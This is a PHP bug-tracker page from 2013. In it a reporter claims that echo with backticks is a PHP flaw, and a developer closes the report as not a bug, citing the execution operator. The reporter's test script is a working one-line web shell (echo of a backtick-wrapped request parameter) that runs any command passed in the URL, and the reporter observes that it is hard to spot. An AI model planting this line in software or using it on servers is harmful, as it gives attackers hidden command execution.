PHP :: Bug #64170 :: ECHO with a character become a backdoor

Bug #64170	ECHO with a character become a backdoor
Submitted:	2013-02-07 18:57 UTC	Modified:	2013-02-07 20:51 UTC
From:	yoco_smart at live dot cn	Assigned:
Status:	Not a bug	Package:	*General Issues
PHP Version:	Irrelevant	OS:	windows & linux
Private report:	No	CVE-ID:	None

View Add Comment Developer Edit

Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.

php.net Username: php.net Password:

Quick Fix:	(description)
	Block user comment
Status:		Assign to:
Package:
Bug Type:
Summary:
From:	yoco_smart at live dot cn
New email:
PHP Version:		OS:

New/Additional Comment:

[2013-02-07 18:57 UTC] yoco_smart at live dot cn

Description:
------------
echo function become a backdoor.
hello, i'm YoCo,from Silic Network Solutions Company,China.
I find that some character can make the function ECHO become the backdoor, just one line!!
like this:
echo `$_POST[x]`;
the quote character is ``, not the '',it is diffrent between ' and `,is it right?
i dont know why the `` will equal the function SYSTEM, i test it both on the windows with iis and linux with apache,both of them are work well, however the ECHO function become a hacker's backdoor, if some one use it, the manager hard to find it.

Test script:
---------------
<?php
/* usage: test.php?x=dir */
echo `$_GET[x]`;
?>

Expected result:
----------------
the ECHO function becomes the SYSTEM function, just one line script.

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports

[2013-02-07 20:51 UTC] sixd@php.net

Sorry, but your problem does not imply a bug in PHP itself.  For a
list of more appropriate places to ask for help using PHP, please
visit http://www.php.net/support.php as this bug system is not the
appropriate forum for asking support questions.  Due to the volume
of reports we can not explain in detail here why your report is not
a bug.  The support channels will be able to provide an explanation
for you.

Thank you for your interest in PHP.

See http://php.net/manual/en/language.operators.execution.php

[2013-02-07 20:51 UTC] sixd@php.net

-Status: Open +Status: Not a bug

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Mon May 27 05:01:31 2024 UTC